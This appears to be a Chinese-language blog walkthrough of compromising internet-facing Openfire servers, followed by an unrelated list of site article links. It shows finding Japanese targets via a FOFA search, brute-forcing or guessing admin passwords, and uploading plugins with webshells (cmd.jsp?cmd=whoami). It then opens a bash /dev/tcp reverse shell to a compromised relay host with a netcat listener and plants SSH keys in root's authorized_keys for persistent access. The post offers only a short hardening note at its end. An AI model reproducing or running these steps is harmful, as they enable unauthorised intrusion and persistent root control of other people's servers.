1.目标获取
(1)fofa.so网站使用搜索body="Openfire, 版本: " && country=JP,可以获取日本存在的Openfire服务器。如图1所示。

图1搜索目标
2.暴力或者使用弱口令登录系统
   一般弱口令admin/admin、admin/admin888、admin/123456,如果不是这些请直接使用burpsuite进行暴力破解,能够正常访问的网站,如图2所示,openfire可能开放不同端口。

图2openfire后台登陆地址
3.进入后台
   输入密码正确后,如图3所示,进入后台,可以查看服务器设置,查看用户/用户群,查看会话,分组聊天以及插件等信息。

图3进入后台
4.查看并上传插件
   单击插件,再其中可以看到所有的插件列表,在上传插件下单击上传插件,选择专门生成的openfire带webshell的插件,如图4所示。

图4上传插件
在本次测试中,从互联网收集了连个插件,如图5所示,均成功上传。

图5上传带webshell的插件
5.获取webshell

(1)helloworld插件获取webshell
  单击服务器-服务器设置,如图6所示,如果helloworld插件上传并运行成功,则会在配置文件下面生成一个用户接口设置。单击该链接即可获取webshel,如图7所示。

图6查看服务器设置

图7获取webshell
(2)broadcast插件获取webshell
   通过url+ plugins/broadcast/webshell文件名称来和获取:
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami
http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp
   在helloworld插件中也可以通过地址来获取
http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp
  如图8,图9所示,分别获取broadcast的webshell以及查看当前用户权限为root。

图8获取当前用户权限

图9获取webshell
6.免root密码登录服务器
   渗透到这里按照过去的思路应该已经结束,不过笔者还想尝试另外一种思路,虽然我们通过webshell可以获取/etc/shadow文件,但该root及其它用户的密码明显不是那么容易被破解的。服务器上面用ssh,能否利用公私钥来解决访问问题。
(1)反弹到肉鸡
执行一下命令,将该服务器反弹到肉鸡服务器xxx.xxx.xxx.xxx的8080端口,需要提前使用nc监听8080端口,也即执行“nc -vv -l -p 8080”如图10所示。

图10监听8080端口
(2)反弹shell到肉鸡
执行命令“bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1”反弹到肉鸡,如图11所示,获取一个反弹shell。

图11反弹shell
7.实际操作流程

(1)远程服务器生成公私钥
在被渗透的服务器上执行“ssh-keygen -t rsa”命令,默认三次回车,如图12所示,会在root/.ssh/目录下生成id_rsa及id_rsa.pub,其中id_rsa为服务器私钥,特别重要,id_rsa.pub为公钥。

图12在远处服务器上生成公私钥
(2)本地linux 上生成公私钥
  在本地linux上执行命令 “ssh-keygen -t rsa”生成公私钥,将远程服务器的id_rsa下载到本地,执行命令“cat id_rsa > /root/.ssh/authorized_keys”命令,将远处服务器的私钥生成到authorized_keys文件。
(3)将本地公钥上传到远程服务器上并生成authorized_keys
cat id_rsa.pub >/root/.ssh/authorized_keys
(4)删除多余文件
rm id_rsa.pub
rm id_rsa
(5)登录服务器
   使用“ssh [email]root@1xx.1xx.111.1xx[/email]”登录服务器,不用输入远程服务器的密码,达到完美登录服务器的目的。效果如图13所示。

图13成功登录对方服务器
8.总结
(1)Openfire需要获取管理员帐号和密码,目前通杀所有帮本。Openfire最新版本为4.1.5.
(2)可以通过burpsuite进行admin管理员帐号的暴力破解。
(3)使用openfire安全加固,可以使用强密码,同时严格设置插件权限,建议除了必须的插件目录外,禁用新创建目录。

最新文章

  1. Matlab中使用脚本和xml文件自动生成bus模块
  2. Web API 使用上安全吗?
  3. SU unisam命令学习
  4. hive中order by,sort by, distribute by, cluster by作用以及用法
  5. FileZilla FTP Server 高级防火墙例外
  6. python字符串截取与替换的例子
  7. C#基础回顾:正则表达式
  8. linux中VI编辑器使用个人记录
  9. HDU1325 &&poj1308 基础并查集
  10. 使用mysqldump 对数据库进行备份的乱码问题
  11. Android Studio的使用(五)--导入第三方Jar包
  12. 怎么制作html5网站页面让它适应电脑和手机的尺寸
  13. swift4.0 正则表达式判断手机号
  14. archlinux 装完系统连接 wifi 网络
  15. 流媒体服务器SRS部署
  16. ROS安装与卸载
  17. 修改 File --> New 菜单内容
  18. Vue.js是什么,vue介绍
  19. CentoOS6.6安装netcat
  20. 敌兵布阵---hud1166(线段树或者树状数组模板)

热门文章

  1. mobx 学习笔记
  2. Java 的API(API: Application(应用) Programming(程序) Interface(接口))
  3. python总结四
  4. ORM之Entity Framework(EF)
  5. c# MongoDB分页辅助类,支持多条件查询
  6. jquery swipper插件的一些弊端
  7. [教程]K8Cscan调用外部程序(Win/Linux批量上控/执行多条命令/保存结果)
  8. js实现对上传图片的路径转成base64编码,并且对图片进行压缩,实现预览功能1
  9. 拦截器配置类使用继承写法导致jackson的全局配置失效
  10. Python做一个计时器的动画